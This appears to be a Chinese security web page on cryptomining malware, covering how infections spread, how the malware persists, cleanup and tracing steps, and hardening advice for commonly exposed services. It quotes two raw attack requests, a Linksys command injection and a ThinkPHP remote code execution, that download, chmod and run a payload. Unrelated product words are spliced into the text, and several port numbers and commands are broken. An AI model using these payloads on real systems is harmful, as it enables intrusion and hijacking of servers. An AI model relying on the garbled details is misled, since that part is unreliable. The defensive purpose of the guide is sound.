⼀挖矿病毒简介
攻击者利⽤相关安全隐患向⽬标机器种植病毒的⾏为。
⼆攻击⽅式
攻击者通常利⽤弱⼝令、未授权、代码执⾏、命令执⾏等漏洞进⾏传播。⽰例如下:
⽰例1:
POST /i HTTP/1.1
Host: 188.166.41.194:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
ttcp_ip=-h `cd /tmp; rm -rf mpsl; wget chmod 777 mpsl; ./mpsl
linksys`&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
⽰例⼆:
GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget -O /tmp/a; chmod 0777 /tmp/a; /tmp/a; HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Host: 103.27.111.204
3.1、杀死其他同类产品以及安全软件。⽐如安骑⼠、青藤云等等
带电清洗剂 3.2、每隔⼀定周期检测⼀次进程是否存
3.3、添加计划任务
3.4、检查⽊马⽂件是否存在
网眼通 3.5、检查发现不存在⽊马⽂件就会⾃⾏远程下载并执⾏
四排查思路
4.0 断⽹
4.1 检查计划任务,并将计划任务的域名或者ip写⼊到 /f中,绑定为 127.0.0.1 脚本域名
4.2 上传busybox
4.3 使⽤busbox中的ps、top、netstat、crontab、kill、rm、chattr等指令按照脚本内容依次删除挖矿脚本添加的内容
4.4 使⽤busybox检查本机是否被写⼊恶意so。⼀般so地址为:/usr/lib/ 若有新增so,则使⽤busybox rm 删除
4.5 进⼊/proc/⽬录计算所有pid 的md5值。即执⾏ md5sum /proc/$pid/exe 并将得到的md5值去威胁情报社区(微步或者VT)查询相关信息
4.6 确认删除计划任务、恶意so、挖矿进程后重启机器。随后再次检查
五⼊侵溯源
5.1 ssh⼊侵。
grep ‘Accept’ /var/secure*
strings /var/wtmp
strings /var/lastlog
strings /var/utmp
strings /var/log/boot.log
cat. /root/.ssh/authorized_keys
⼀般⽽⾔,若在挖矿脚本中发现以上⽂件被删除或者置空,则99%可确定为是通过ssh 爆破进来,则修复建议如下: 阳极钢爪5.1.1 升级openssh
5.1.2 使⽤长度⼤约8的多种字符组合的密码
5.1.3 安装fail2ban,
5.2 未授权⼊侵。
常见存在未授权的应⽤如下
redis、jenkins、mongodb、zookeeper、es、memcache、hadoop、couchdb、docker、k8s
服务名常见未授权原因修复建议
redis 6379对外开放,
且使⽤弱⼝令或者
未设置密码
1 iptables 设定6379 ip⽩名单轮胎帘布
2 设置redis强⼝令
jenkins弱⼝令、script未
授权1 设置强密码
2 管理后台建议禁⽌开放公⽹,建议使⽤iptables指定来源ip
授权 2 管理后台建议禁⽌开放公⽹,建议使⽤iptables指定来源ip好记忆学习枕
mongodb27017 1 本地访问
bind 127.0.0.1
2 修改默认端⼝
修改默认的mongoDB端⼝(默认为: TCP 27017)为其他端⼝
3 禁⽤HTTP和REST端⼝
MongoDB⾃⾝带有⼀个HTTP服务和并⽀持REST接⼝。在2.6以后这些接⼝默认是关闭的。mongoDB默认会使⽤默认端⼝监听web服务,⼀般不需要通过web⽅式进⾏远程管理,建议禁⽤。修改配置⽂件或在启动的时候选择–nohttpinterface 参数nohttpinterface = false
4 开启⽇志审计功能
辐照剂量审计功能可以⽤来记录⽤户对数据库的所有相关操作。这些记录可以让系统管理员在需要的时候分析数据库在什么时段发⽣了什么事情
5 开启auth认证
/f
auth = true
6 开启鉴权模式
zookeeper21811 禁⽌把Zookeeper直接暴露在公⽹
2 添加访问控制,根据情况选择对应⽅式(认证⽤户,⽤户名密码,指定IP)
Es92001 默认开启的9200端⼝和使⽤的端⼝不对外公布,或架设内⽹环境。或者防⽕墙上设置禁⽌外⽹访问9200端⼝。
2 架设nginx反向代理服务器,并设置http basic认证来实现elasticsearch的登录认证。
3 限制IP访问,绑定固定IP
4 为elasticsearch增加登录验证,可以使⽤官⽅推荐的shield插件.
Memcache112111.限制访问
2.防⽕墙
3.使⽤最⼩化权限账号运⾏Memcached服务
4.启⽤认证功能
5.修改默认端⼝
6.定期升级
Hadoop80881 ⽹络访问控制
2 启⽤认证功能
3 更新补丁
Couchdb59841 指定CouchDB绑定的IP
2 设置访问密码
Docker 21811 ⽹络访问控制
2 低权限运⾏
K8s8080、64431 ⾝份校验
2 设置密码
cms代码执⾏、命令执
⾏、注⼊等等
升级、打补丁
总之根据对应的服务,⼀⼀排查,挖矿病毒、ddos病毒类的都是脚本⾃动化执⾏,⼀般都是以上安全隐患造成的中毒。
豫公网安备41160202000603
站长QQ:729038198
关于我们
投诉建议